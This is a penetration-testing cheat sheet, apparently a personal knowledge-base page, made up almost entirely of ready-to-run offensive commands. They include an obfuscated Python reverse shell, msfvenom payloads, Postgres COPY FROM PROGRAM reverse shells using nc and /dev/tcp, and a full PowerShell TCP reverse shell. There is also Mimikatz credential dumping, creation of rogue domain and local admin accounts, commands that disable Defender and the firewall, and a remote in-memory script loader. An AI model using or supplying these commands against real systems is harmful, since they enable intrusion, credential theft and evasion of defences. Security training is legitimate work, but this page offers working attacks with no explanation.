Msfvenom

Python

msfvenom -p cmd/unix/reverse_python LHOST=10.10.15.149 LPORT=1234 R
 
 
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkN8LgjAQx/+V2NMEmc7sIWIPEgYRFaTvomuhZLvhzf8/lhs9ehzcr8/dF274GJjsBkG+ld38LMa5MxNIhegb4JNDD2gF4SlzvmM83xM/cVcEz7a5r1EsJ9kSqK+KU3O+lXUQWprV/XhpqvpRFtcorDMJWitpKXWannciUUAA2XM2GUX2GkalgfpBnK4SfJXIAmHE/xtMtuNISdINOula7En0BYiDVuU=')[0])))"

Powershell

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.15.211 LPORT=80 R

SQL

Postgres 5432

proxychains psql -h 127.0.0.1  -p 5432 -U 'postgres'
CREATE TABLE shell(output text);
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.149 2020 > /tmp/f';
 
 
 
 
# Getting bash shell
 
postgres=# CREATE TABLE bash_shell (output text);
CREATE TABLE
postgres=# COPY bash_shell FROM PROGRAM $$/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.45.225/4444 0>&1'$$;

SSH

id_rda

ssh root@10.10.110.123 -i id_rsa

Mimikatz

Escalate Privlieges

privilege::debug

token::elevate

Cached credential Storage and Retrieval

mimikatz # lsadump::sam
mimikatz # sekurlsa::logonpasswords

Active Directory

Enumeration

windows

net view /domain

Add domain user and put them in Domain Admins group

net user username password /ADD /DOMAIN
 
net group "Domain Admins" ipsec /ADD /DOMAIN

File transfer

Certutil

windows

certutil -urlcache -split -f http://192.168.49.135:80000/active-
directory/GetUserSPNs.ps1

Windows

Adding user

net user /add  ipsec TryHarder.1234
 
net localgroup administrators ipsec /add

Enumeration

groups

 
whoami /groups

system information

systeminfo

High mandatory level

powershell.exe Start-Process cmd.exe -Verb runAs

Disable AV

Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus

Disable Firewall

netsh advfirewall set allprofiles state off
netsh advfirewall set currentprofile state off

Impacket

SmbClient

impacket-smbclient 'corp.local/ned.flanders_adm:Lefthandedyeah!@172.16.1.36' -dc-ip 172.16.1.5

GetUserSPNs

impacket-GetUserSPNs 'corp.local/ned.flanders_adm:Lefthandedyeah!' -dc-ip 172.16.1.5

AMSI bypass

In Memory Execution

powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.149:80/large.ps1')

Basic Powershell

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.16.108', 4443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

https://exploit-notes.hdks.org/exploit/web/apache-tomcat-pentesting/

https://github.com/0xJs/RedTeaming_CheatSheet/blob/main/infrastructure/privesc_windows.md

Malleum Knowledge Base

Explorer

Cheetsheet

Msfvenom

Python

Powershell

SQL

Postgres 5432

SSH

id_rda

Mimikatz

Escalate Privlieges

Cached credential Storage and Retrieval

Active Directory

Enumeration

Add domain user and put them in Domain Admins group

File transfer

Certutil

Windows

Adding user

Enumeration

groups

system information

High mandatory level

Disable AV

Disable Firewall

Impacket

SmbClient

GetUserSPNs

AMSI bypass

In Memory Execution

Basic Powershell

Graph View

Table of Contents